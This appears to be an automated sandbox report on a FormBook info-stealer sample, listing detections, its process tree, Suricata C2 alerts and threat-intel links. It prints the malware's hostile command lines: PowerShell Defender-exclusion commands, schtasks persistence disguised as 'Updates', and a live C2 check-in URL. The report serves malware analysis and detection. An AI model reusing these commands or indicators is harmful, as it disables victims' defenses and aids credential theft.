Edit tour

Windows Analysis Report
zE1VxVoZ3W.exe

Overview

General Information

Sample name:	zE1VxVoZ3W.exe renamed because original name is a hash value
Original sample name:	2bd00e0d7cb7e741f8736ede2f6b354c7190e983bc38ca8326f8135b81256055.exe
Analysis ID:	1587668
MD5:	3af13fb92c445d73e1ce763d1400d39c
SHA1:	cf6bd2be897eb2c40308543f2409f0d26dd84d58
SHA256:	2bd00e0d7cb7e741f8736ede2f6b354c7190e983bc38ca8326f8135b81256055
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Process Parents

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

zE1VxVoZ3W.exe (PID: 5932 cmdline: "C:\Users\user\Desktop\zE1VxVoZ3W.exe" MD5: 3AF13FB92C445D73E1CE763D1400D39C)

powershell.exe (PID: 7108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zE1VxVoZ3W.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 908 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5292 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp7D49.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

zE1VxVoZ3W.exe (PID: 5972 cmdline: "C:\Users\user\Desktop\zE1VxVoZ3W.exe" MD5: 3AF13FB92C445D73E1CE763D1400D39C)

IBBkYiJCUMDfM.exe (PID: 5544 cmdline: "C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

winver.exe (PID: 6720 cmdline: "C:\Windows\SysWOW64\winver.exe" MD5: B5471B0FB5402FC318C82C994C6BF84D)

IBBkYiJCUMDfM.exe (PID: 3572 cmdline: "C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 3232 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

ydRhqlPsLsIczR.exe (PID: 4420 cmdline: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe MD5: 3AF13FB92C445D73E1CE763D1400D39C)

schtasks.exe (PID: 5292 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp99F9.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ydRhqlPsLsIczR.exe (PID: 2972 cmdline: "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe" MD5: 3AF13FB92C445D73E1CE763D1400D39C)

ydRhqlPsLsIczR.exe (PID: 3212 cmdline: "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe" MD5: 3AF13FB92C445D73E1CE763D1400D39C)

ydRhqlPsLsIczR.exe (PID: 900 cmdline: "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe" MD5: 3AF13FB92C445D73E1CE763D1400D39C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.1996556197.0000000001370000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000016.00000002.4059491839.00000000022A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000015.00000002.4059783841.0000000004580000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000015.00000002.4057661032.0000000002710000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.1993276336.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.1997237441.00000000028D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000015.00000002.4059982269.0000000004620000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: zE1VxVoZ3W.exe PID: 5932	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ydRhqlPsLsIczR.exe PID: 4420	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.zE1VxVoZ3W.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.zE1VxVoZ3W.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zE1VxVoZ3W.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zE1VxVoZ3W.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zE1VxVoZ3W.exe", ParentImage: C:\Users\user\Desktop\zE1VxVoZ3W.exe, ParentProcessId: 5932, ParentProcessName: zE1VxVoZ3W.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zE1VxVoZ3W.exe", ProcessId: 7108, ProcessName: powershell.exe

Sigma detected: Suspicious Process Parents

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe" , CommandLine: "C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe, NewProcessName: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe, OriginalFileName: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe, ParentCommandLine: "C:\Windows\SysWOW64\winver.exe", ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 6720, ParentProcessName: winver.exe, ProcessCommandLine: "C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe" , ProcessId: 3572, ProcessName: IBBkYiJCUMDfM.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp99F9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp99F9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe, ParentImage: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe, ParentProcessId: 4420, ParentProcessName: ydRhqlPsLsIczR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp99F9.tmp", ProcessId: 5292, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp7D49.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp7D49.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\zE1VxVoZ3W.exe", ParentImage: C:\Users\user\Desktop\zE1VxVoZ3W.exe, ParentProcessId: 5932, ParentProcessName: zE1VxVoZ3W.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp7D49.tmp", ProcessId: 5292, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zE1VxVoZ3W.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zE1VxVoZ3W.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zE1VxVoZ3W.exe", ParentImage: C:\Users\user\Desktop\zE1VxVoZ3W.exe, ParentProcessId: 5932, ParentProcessName: zE1VxVoZ3W.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zE1VxVoZ3W.exe", ProcessId: 7108, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp7D49.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp7D49.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\zE1VxVoZ3W.exe", ParentImage: C:\Users\user\Desktop\zE1VxVoZ3W.exe, ParentProcessId: 5932, ParentProcessName: zE1VxVoZ3W.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp7D49.tmp", ProcessId: 5292, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:40:50.253492+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49713	188.114.96.3	80	TCP
2025-01-10T16:41:03.601910+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49981	84.32.84.32	80	TCP
2025-01-10T16:41:22.935788+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49987	3.33.130.190	80	TCP
2025-01-10T16:41:36.710771+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49991	91.195.240.123	80	TCP
2025-01-10T16:41:50.400334+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49995	38.181.21.54	80	TCP
2025-01-10T16:42:04.040733+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49999	78.141.202.204	80	TCP
2025-01-10T16:42:17.733479+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50003	156.253.8.115	80	TCP
2025-01-10T16:42:30.903404+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50007	142.93.62.161	80	TCP
2025-01-10T16:42:44.704987+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50011	104.21.96.1	80	TCP
2025-01-10T16:42:58.069647+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50015	209.74.79.42	80	TCP
2025-01-10T16:43:11.989976+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50019	192.186.57.30	80	TCP
2025-01-10T16:43:25.864795+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50023	84.32.84.32	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:40:55.825374+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49941	84.32.84.32	80	TCP
2025-01-10T16:40:59.425754+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49957	84.32.84.32	80	TCP
2025-01-10T16:41:00.941931+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49967	84.32.84.32	80	TCP
2025-01-10T16:41:10.316701+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49984	3.33.130.190	80	TCP
2025-01-10T16:41:11.817068+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49985	3.33.130.190	80	TCP
2025-01-10T16:41:14.344989+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49986	3.33.130.190	80	TCP
2025-01-10T16:41:28.635546+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49988	91.195.240.123	80	TCP
2025-01-10T16:41:31.181715+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49989	91.195.240.123	80	TCP
2025-01-10T16:41:33.724496+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49990	91.195.240.123	80	TCP
2025-01-10T16:41:42.736924+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49992	38.181.21.54	80	TCP
2025-01-10T16:41:45.335087+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49993	38.181.21.54	80	TCP
2025-01-10T16:41:48.090904+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49994	38.181.21.54	80	TCP
2025-01-10T16:41:56.380120+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49996	78.141.202.204	80	TCP
2025-01-10T16:41:58.955635+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49997	78.141.202.204	80	TCP
2025-01-10T16:42:01.514553+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49998	78.141.202.204	80	TCP
2025-01-10T16:42:10.047041+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50000	156.253.8.115	80	TCP
2025-01-10T16:42:12.602254+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50001	156.253.8.115	80	TCP
2025-01-10T16:42:15.150112+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50002	156.253.8.115	80	TCP
2025-01-10T16:42:23.291933+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50004	142.93.62.161	80	TCP
2025-01-10T16:42:25.795576+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50005	142.93.62.161	80	TCP
2025-01-10T16:42:28.376096+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50006	142.93.62.161	80	TCP
2025-01-10T16:42:37.077850+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50008	104.21.96.1	80	TCP
2025-01-10T16:42:39.618013+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50009	104.21.96.1	80	TCP
2025-01-10T16:42:42.273070+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50010	104.21.96.1	80	TCP
2025-01-10T16:42:50.365114+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50012	209.74.79.42	80	TCP
2025-01-10T16:42:52.928901+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50013	209.74.79.42	80	TCP
2025-01-10T16:42:55.473579+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50014	209.74.79.42	80	TCP
2025-01-10T16:43:04.411989+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50016	192.186.57.30	80	TCP
2025-01-10T16:43:06.933517+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50017	192.186.57.30	80	TCP
2025-01-10T16:43:09.481266+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50018	192.186.57.30	80	TCP
2025-01-10T16:43:17.533200+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50020	84.32.84.32	80	TCP
2025-01-10T16:43:20.080787+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50021	84.32.84.32	80	TCP
2025-01-10T16:43:22.745067+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50022	84.32.84.32	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: zE1VxVoZ3W.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.gisxj.sbs/bzmd/	Avira URL Cloud: Label: malware
Source: http://www.gisxj.sbs/bzmd/?LH1t=Rt+43bg4Ok23e54YRfAH+vyFRMP1sUgI2DMHftvVCAd/nWF0JqXCSMibGLO2dcXMoNINCP/gJGrlf22QDBjVZjqHznYH4uPEIO/lAdIm4TOVCBTzftZlepKPWee8U8pSUA==&fpJ=16J40rx8bHP8SV	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe

Avira: detection malicious, Label: HEUR/AGEN.1306657

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe

ReversingLabs: Detection: 76%

Multi AV Scanner detection for submitted file

Source: zE1VxVoZ3W.exe	Virustotal: Detection: 57%			Perma Link
Source: zE1VxVoZ3W.exe	ReversingLabs: Detection: 76%

Yara detected FormBook

Source: Yara match	File source: 9.2.zE1VxVoZ3W.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.zE1VxVoZ3W.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1996556197.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.4059491839.00000000022A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4059783841.0000000004580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4057661032.0000000002710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1993276336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1997237441.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4059982269.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: zE1VxVoZ3W.exe

Joe Sandbox ML: detected

Source: zE1VxVoZ3W.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: zE1VxVoZ3W.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: winver.pdb source: zE1VxVoZ3W.exe, 00000009.00000002.1994095406.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000003.1931684465.000000000103B000.00000004.00000001.00020000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000002.4058519534.0000000001028000.00000004.00000020.00020000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000003.2148372053.0000000001048000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IBBkYiJCUMDfM.exe, 00000014.00000000.1902088127.00000000005AE000.00000002.00000001.01000000.0000000D.sdmp, IBBkYiJCUMDfM.exe, 00000016.00000000.2063497068.00000000005AE000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: zE1VxVoZ3W.exe, 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000015.00000003.1996321459.0000000004623000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000015.00000002.4060632755.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000015.00000002.4060632755.000000000496E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000015.00000003.1993642718.0000000004452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: zE1VxVoZ3W.exe, zE1VxVoZ3W.exe, 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000015.00000003.1996321459.0000000004623000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000015.00000002.4060632755.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000015.00000002.4060632755.000000000496E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000015.00000003.1993642718.0000000004452000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winver.pdbGCTL source: zE1VxVoZ3W.exe, 00000009.00000002.1994095406.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000003.1931684465.000000000103B000.00000004.00000001.00020000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000002.4058519534.0000000001028000.00000004.00000020.00020000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000003.2148372053.0000000001048000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: EJBjR.pdb source: zE1VxVoZ3W.exe, ydRhqlPsLsIczR.exe.0.dr
Source:	Binary string: EJBjR.pdbSHA256^ source: zE1VxVoZ3W.exe, ydRhqlPsLsIczR.exe.0.dr

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 4x nop then jmp 077390B3h		0_2_0773868E
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Code function: 4x nop then jmp 0714835Eh		10_2_07147936

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49713 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49957 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49967 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49984 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49987 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49990 -> 91.195.240.123:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49995 -> 38.181.21.54:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50000 -> 156.253.8.115:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49993 -> 38.181.21.54:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50003 -> 156.253.8.115:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50022 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49985 -> 3.33.130.190:80
